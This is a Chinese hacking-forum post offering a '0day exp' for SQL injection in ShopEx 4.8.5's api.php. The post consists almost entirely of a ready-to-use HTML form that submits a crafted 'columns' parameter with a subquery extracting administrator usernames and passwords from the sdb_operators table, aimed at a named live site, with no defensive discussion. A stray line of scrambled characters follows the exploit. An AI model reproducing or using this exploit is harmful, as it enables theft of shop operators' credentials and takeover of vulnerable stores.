找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2546|回复: 0
打印 上一主题 下一主题

shopex 4.8.5 api.php注入漏洞0day exp

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:45:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<form method='post' action='http://www.sysshell.com/api.php?act=search_dly_type&api_version=1.0'>    columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />    <input type='submit' value='submit' /><br /></form><script>//document.forms[0].submit()</script>
1 R1 B7 X$ {* `/ _- F' s4 o* Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表